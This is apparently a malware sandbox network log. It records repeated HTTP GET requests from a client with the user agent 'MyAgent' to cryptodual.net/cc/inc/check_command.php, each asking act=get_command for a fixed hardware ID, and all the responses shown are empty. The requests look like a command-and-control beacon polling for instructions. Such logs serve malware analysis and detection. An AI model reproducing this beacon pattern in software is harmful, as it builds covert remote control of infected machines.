Jan 4, 2021 19:16:26.206381083 CET	1307	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770366d360000d6d952922000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=AxB0h4Wl3qGRZ%2B1x8WK87kIH74dg%2Bg%2FPljKgcitOSBe80y0zN42JM%2FDAMmZX3P0ghZnLaGa7VoOy5K%2BWmZTOvzCZIJckExclbcx0qr%2FHPA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f35b8d0ed6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:31.236563921 CET	1307	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:31.325584888 CET	1308	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036812a0000d6d92c015000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2ErR3Fha3RdD3w08NgHVhHtjrWsXkZ71V8Ni7%2BGPV%2BB%2FOBw%2F%2FlvCh6gHtNXeCASvYhWAHwR516wCbPsQW9XIl%2B8VvOCYDX%2BtPUqWKrA31w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f37b79a3d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:31.327785969 CET	1308	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:31.413295031 CET	1309	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036818d0000d6d94ebe9000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=xHEMt%2BuyoC3h5CSHTKIPyt3kNvebq%2BOYb3VCUhsaqj5J61FvVA24%2F2%2FGHl5y6%2FlxVsp6YfPH6PT9gULIKRdG8ujUzLkSZgC19%2BEdK2KM2A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f37c1aeed6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:31.416656971 CET	1310	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:31.495723963 CET	1310	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703681e00000d6d91fbd0000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=qymNSL7FDtajxjhOSnYT6rK1UBBK8tpcTBkmmKv8ehkdBCm4a4xQiHlI8an0l%2FnCZtw412jGnHY39I4zmPwQZE1KTNfoWZMZkmwwxWoEBw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f37c9c16d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:31.497657061 CET	1311	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:31.583204031 CET	1311	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703682300000d6d9570b2000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=jC%2B6DbtuQuNwfOjj839voNVku7EXa%2BBGejmf%2BRv%2FCWj0V1FRE6XM%2BDR7cFZ73J9IotEsjWPtxOCmiB6BIjUlHq3NcJolqSw%2Bw9uowZWN3w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f37d1d31d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:36.587044954 CET	1312	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:36.695008993 CET	1312	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703696100000d6d9209ee000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QkTu5aGWl3htBmY5dznxL2X49FCJQ%2FMJPuw3y7THi9XAxd4%2BlmFjcnlB8Z7ABYPvvwP4KAR3cvkdg4YPu8U0s4649c%2F4upulUT%2BT9tYzMQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f39ce8e3d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:36.697040081 CET	1313	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:36.781266928 CET	1313	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036967e0000d6d90a060000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DP4oGINFSFhDGPoz3FKtEbbtY8eLkxfdLKnBOYabmnbO5of8D7qGmB482TD3jawsgwJ4mzfB2wb9v%2FnhkScey2Y3tc1mHh0pcnxxBmDrCg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f39d9a4bd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:36.783519030 CET	1314	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:36.861104965 CET	1314	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703696d50000d6d9fb0df000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=01TYgM8r3MiWEfc9mESGpqjmle5en4Xzjmdo3WHgxGJahIiFEb%2B5VYSWxJpjMHaLq5HqF%2FfXp3faWGC0FXykluAcT4gKT%2B0pdLvHQQMyQQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f39e2b68d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:36.862987041 CET	1315	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:36.945493937 CET	1315	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703697240000d6d94e9b4000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=R86qVaGqSKEptF64FOf7iaJ7EBsjD7kAiRqhy43JTyvF50JYV74uxH2%2F1etzLPZ57LeK38KVbqWfNhR4j6%2FXss%2FCcDHvBv9IVlyEPSGBwg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f39eac69d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:41.952533960 CET	1316	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:42.027641058 CET	1316	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036ab060000d6d94eb43000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ejMbvBQvbxwGMLprk%2F6DmOlpIjXrfhAmaob%2BDnIYWY%2FuXKgflsIi7fT%2BBC3FbVBLZxgymJ2eMZK34%2BfpNmGQ84SqanM8rPHeH2turny8QQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f3be6883d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:42.029711962 CET	1317	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:42.116765976 CET	1317	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036ab530000d6d957040000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=nMm0kHRn%2B2iTEWiE1m1cbJ8oFC7M5fVNJ4614LtYheFNYM9tc8ew4jN%2FWJCA%2BBLcSv8n00G54nvbWw6MfYbwpND4mo6xndWF7j5oSSiIjQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f3bee9acd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:42.119549990 CET	1318	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:42.201600075 CET	1319	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036abae0000d6d96195e000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UuGk3I6SpQrIM8N6SKJep9ZC7EGkgHwsE1WJPLRO7pJLZ7LRBm6q259i2DFPYRzCmrzGAmUMjZ8aOI4gpZ35cPmYaG%2BvMkLATRrj9uJOiQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f3bf7ac6d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:42.203073978 CET	1319	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:42.283946991 CET	1320	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036ac010000d6d9f3886000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Lk%2BTbQC2aANHd3%2BifelcFtAqzEC9pnvEnvPuT%2BzS7X7p61smsr8trel%2FPZkApPh4ypGb1rDH%2FsBNqqXbmHWxobfi%2BMvQqWKONl%2BYS6JcoA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f3c00bbbd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:47.290327072 CET	1320	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:47.378499985 CET	1321	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036bfe10000d6d9378d0000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8AvwaxM95S%2BsQsWcg0jJv9XOikQtS2PjQw9Oi7c2g3zUGSZnVZlSqrEY6Ma%2BvyjnUAcNur0u6QTrzLcM3heiUBjhg2CmMVJK2UI1zJmoeg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f3dfc87cd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:47.380897999 CET	1321	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:47.465764999 CET	1322	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036c03e0000d6d90fac9000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=33GZ0mYln6L4E5PiGLEx5GV66UA%2F0ycrAY%2B%2BhyVuROwdcd6zs4YUDgHrQAELrEqE54jwSR4RHQjsDS9CPFuyB12zLAekNf0VNvjA3Ml%2FdQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f3e069ebd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:47.467653990 CET	1322	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:47.545320034 CET	1323	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036c0910000d6d90d99a000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=J00YQwq6ufqjPeH0VpCt8g%2ByMdrK8B4ystOe2eS6HAoERuhLuAzWEvJVS2a2bFXkmgvVlBMYKgVj2wUlKo9kTw0kZoprMkYj1bnTAZ6WAA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f3e0eb05d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:47.546960115 CET	1323	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:47.629568100 CET	1324	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036c0e10000d6d901831000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vXuqEFkTkGjlTNPefp11i2ea9pID5RZ36O%2FS%2FhDDo5cod9OabTc1NBfTRbxneCNr80536L2%2Fa%2BDGcSoFl5t0IV5n2hjLp05ZOf1GD8Ji5g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f3e16c05d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:52.639884949 CET	1324	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:53.832005978 CET	1325	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036d4c80000d6d92e076000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=z747ZsICptE%2BtvsKmbsDgd2OwDpixGkD7qkyGq8mDTjUw8ffI4%2F5wuJzudTg%2Fh92Wnj7hHJ71xhGW5igeZy%2B22wGudvWtNLMsIjpFuOyzA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4013fd8d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:53.833966017 CET	1325	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:53.915386915 CET	1326	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036d96f0000d6d96ea46000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=JTZlfSo42B14CugJTwyRGDo0YoWs67kGfMTj9RxMlEtngj%2FKAhKXgl23jHdjfF2YdNoxvA0C3pj900MV5pHPTgMKMqw0ZkBovrEuhXxa5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f408b85cd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:53.917467117 CET	1326	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:53.999548912 CET	1327	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036d9c30000d6d91c0f1000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=XFn5T3on%2FGhf39LaYX7GWhowZQY%2BT1rGi2CYCJbF9J6RgqPdTuG1ZqQMuvn1PA%2FLIva0OU7OycX%2Fv5FPs0vCFa839hmD9iixk9rwjnNvhA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f4093988d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:54.001650095 CET	1327	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:54.084297895 CET	1328	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036da1a0000d6d90a1ae000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=fl6r9wAQcyYZuBTMOIs4sR1jyXjN5SkzUyrAliCCNqslktpo3Z0o4jRFiyERxwtTD9VDwmgT7ZRSdRQxjOeGVu%2F4hcwMRjaHBB2otVaeaQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f409bab3d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:59.101597071 CET	1328	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:59.187345028 CET	1329	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036ee070000d6d9718e8000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=54WVtqxUjOCsGy1MbEmbTRLqUEu7aLUPg2iq%2Ffktc8hO%2B5U2EhKN1xX%2FztWXrdlfPwifBQIhASG9kW8AOHzitAlDSe3FUAhfznu4jm%2FhGQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f429a9c6d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:59.190732956 CET	1329	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:59.280184031 CET	1330	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036ee5c0000d6d94e8d1000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=hqrkRr8QoQvIkO46i8i%2FqX%2B0JFi9JYUV%2BaT5aXzP5u3sW1oGJA%2BwhqxRGDDdNxAKHz1i4USlKK5u0imA5BstbLtwADFZ8kOJyM3VUUvOQw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f42a2ad9d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:59.283482075 CET	1330	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:59.358824015 CET	1331	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036eeb80000d6d923801000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MO4cZ9KUpO4z7%2F639znRA%2FAPOvgcl1dLdHrdlUdBFOYVqdpcT4RSwihU2aJjp0HwK1boK0%2F7bFKkm81TFNkBamkHckBqJ0bhRsgewdcp2A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f42acc0fd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:59.363204002 CET	1331	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
